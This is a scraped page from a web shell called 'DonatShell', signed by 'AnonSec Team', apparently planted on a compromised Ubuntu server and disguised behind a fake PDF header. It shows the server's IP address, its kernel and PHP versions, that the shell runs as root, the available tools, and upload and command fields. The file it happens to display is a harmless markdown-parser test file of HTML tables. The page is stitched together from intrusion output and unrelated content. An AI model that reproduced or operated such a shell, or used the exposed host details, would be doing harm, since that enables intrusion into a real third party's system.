%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/egp/vendor/cebe/markdown/tests/extra-data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/egp/vendor/cebe/markdown/tests/extra-data/tables.html
<h2>Tables</h2>
<table>
<thead>
<tr><th>First Header</th><th>Second Header</th></tr>
</thead>
<tbody>
<tr><td>Content Cell</td><td>Content Cell</td></tr>
<tr><td>Content Cell</td><td>Content Cell</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>First Header</th><th>Second Header</th></tr>
</thead>
<tbody>
<tr><td>Content Cell</td><td>Content Cell</td></tr>
<tr><td>Content Cell</td><td>Content Cell</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Name</th><th>Description</th></tr>
</thead>
<tbody>
<tr><td>Help</td><td>Display the help window.</td></tr>
<tr><td>Close</td><td>Closes a window</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Name</th><th>Description</th></tr>
</thead>
<tbody>
<tr><td>Help</td><td><strong>Display the</strong> help window.</td></tr>
<tr><td>Close</td><td><em>Closes</em> a window</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Default-Align</th><th align="left">Left-Aligned</th><th align="center">Center Aligned</th><th align="right">Right Aligned</th></tr>
</thead>
<tbody>
<tr><td>1</td><td align="left">col 3 is</td><td align="center">some wordy text</td><td align="right">$1600</td></tr>
<tr><td>2</td><td align="left">col 2 is</td><td align="center">centered</td><td align="right">$12</td></tr>
<tr><td>3</td><td align="left">zebra stripes</td><td align="center">are neat</td><td align="right">$1</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Simple</th><th>Table</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
<tr><td>3</td><td>4</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Simple</th><th>Table</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
<tr><td>3</td><td>4</td></tr>
<tr><td>3</td><td>4     |</td></tr>
<tr><td>3</td><td>4    \</td></tr>
</tbody>
</table>
<p>Check https://github.com/erusev/parsedown/issues/184 for the following:</p>
<table>
<thead>
<tr><th>Foo</th><th>Bar</th><th>State</th></tr>
</thead>
<tbody>
<tr><td><code>Code | Pipe</code></td><td>Broken</td><td>Blank</td></tr>
<tr><td><code>Escaped Code \| Pipe</code></td><td>Broken</td><td>Blank</td></tr>
<tr><td>Escaped | Pipe</td><td>Broken</td><td>Blank</td></tr>
<tr><td>Escaped \</td><td>Pipe</td><td>Broken</td><td>Blank</td></tr>
<tr><td>Escaped \</td><td>Pipe</td><td>Broken</td><td>Blank</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th align="left">Simple</th><th>Table</th></tr>
</thead>
<tbody>
<tr><td align="left">3</td><td>4</td></tr>
<tr><td align="left">3</td><td>4</td></tr>
<tr><td align="left">5</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Mixed</th><th>Table</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
<tr><td>3</td><td>4</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Mixed</th><th>Table</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
<tr><td>3</td><td>4</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Mixed</th><th>Table</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
<tr><td>3</td><td>4</td></tr>
</tbody>
</table>
<p>some text</p>
<table>
<thead>
<tr><th>single col</th></tr>
</thead>
<tbody>
<tr><td>1</td></tr>
<tr><td>2</td></tr>
<tr><td>3</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Table</th><th>With</th><th>Empty</th><th>Cells</th></tr>
</thead>
<tbody>
<tr><td></td><td></td><td></td><td></td></tr>
<tr><td>a</td><td></td><td>b</td><td></td></tr>
<tr><td></td><td>a</td><td></td><td>b</td></tr>
<tr><td>a</td><td></td><td></td><td>b</td></tr>
<tr><td></td><td>a</td><td>b</td><td></td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th></th></tr>
</thead>
<tbody>
<tr><td></td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th></th><th></th></tr>
</thead>
<tbody>
<tr><td></td><td></td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Table</th><th>Indentation</th></tr>
</thead>
<tbody>
<tr><td>A</td><td>B</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Table</th><th>Indentation</th></tr>
</thead>
<tbody>
<tr><td>A</td><td>B</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th>Table</th><th>Indentation</th></tr>
</thead>
<tbody>
<tr><td>A</td><td>B</td></tr>
</tbody>
</table>
<pre><code>| Table | Indentation |
</code></pre>
<p>   | ----- | ---- |
 | A     | B    |</p>
<table>
<thead>
<tr><th align="left">Table</th><th>Indentation</th></tr>
</thead>
<tbody>
</tbody>
</table>
<pre><code>| A     | B    |
</code></pre>
<table>
<thead>
<tr><th>Item</th><th align="right">Value</th></tr>
</thead>
<tbody>
<tr><td>Computer</td><td align="right">$1600</td></tr>
<tr><td>Phone</td><td align="right">$12</td></tr>
<tr><td>Pipe</td><td align="right">$1</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th align="center">a</th><th align="center">b</th><th align="center">c</th></tr>
</thead>
<tbody>
<tr><td align="center">1</td><td align="center">2</td><td align="center">3</td></tr>
</tbody>
</table>
<table>
<thead>
<tr><th align="left">a</th><th align="center">b</th><th align="left">c</th><th align="center">d</th></tr>
</thead>
<tbody>
<tr><td align="left">1</td><td align="center">2</td><td align="left">3</td><td align="center">4</td></tr>
</tbody>
</table>

Anon7 - 2022
AnonSec Team